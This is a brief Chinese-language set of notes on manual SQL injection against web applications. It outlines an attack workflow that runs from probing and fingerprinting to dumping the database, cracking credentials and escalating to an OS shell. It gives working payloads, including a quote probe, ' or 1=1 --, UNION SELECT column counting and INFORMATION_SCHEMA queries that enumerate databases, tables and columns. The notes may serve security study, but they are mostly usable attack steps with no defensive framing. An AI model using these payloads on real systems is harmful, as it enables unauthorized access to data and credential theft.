流程
- 判断是否有sql注入漏洞 – 扫描端口
- 判断操作系统,数据库,web类型
- 获取数据库信息,管理员信息 拖库
- 加密信息破解
- 提升权限 获得sql-shell、os-shell、后台登录。
第一个注入语句
要注入时 我们可以先输入 '
对 ,就是 单引号 如果出现数据库报错 我们就有机会进行下一步操作
注入' or 1=1 --
’ :闭合前面的单引号
or : 或者
– : 注释后面的
使用union查询
union语句查询用于联合前面的select查询语句,合并查询更多信息
注入
手动测试有几个信息 union 联合查询 需要知道前面有几条信息
' union select 1 --'
' union select 1,2 --'
...
比如查到有两个 那我们可查询有用信息
//注入查询 当前用户的名字和数据库
' union select user(),database() --'
version() //数据库版本号
database()// 数据库名
user() //当前用户
columns_name 列名
table_name 表名
INFORMATION_SCHEMA.tables
这个表中有TABLE_SCHEMA 字段 存放的是各数据库名
INFORMATION_SCHEMA.columns
//注入 查询所有库名
' union select TABLE_SCHEMA,1 from INFORMATION_SCHEMA.TABLES --'
//数据库库名
// 注入 查询数据表
' union select 1,column_name from INFORMATION_SCHEMA.columns where table_name='***' --'
//*** 是表明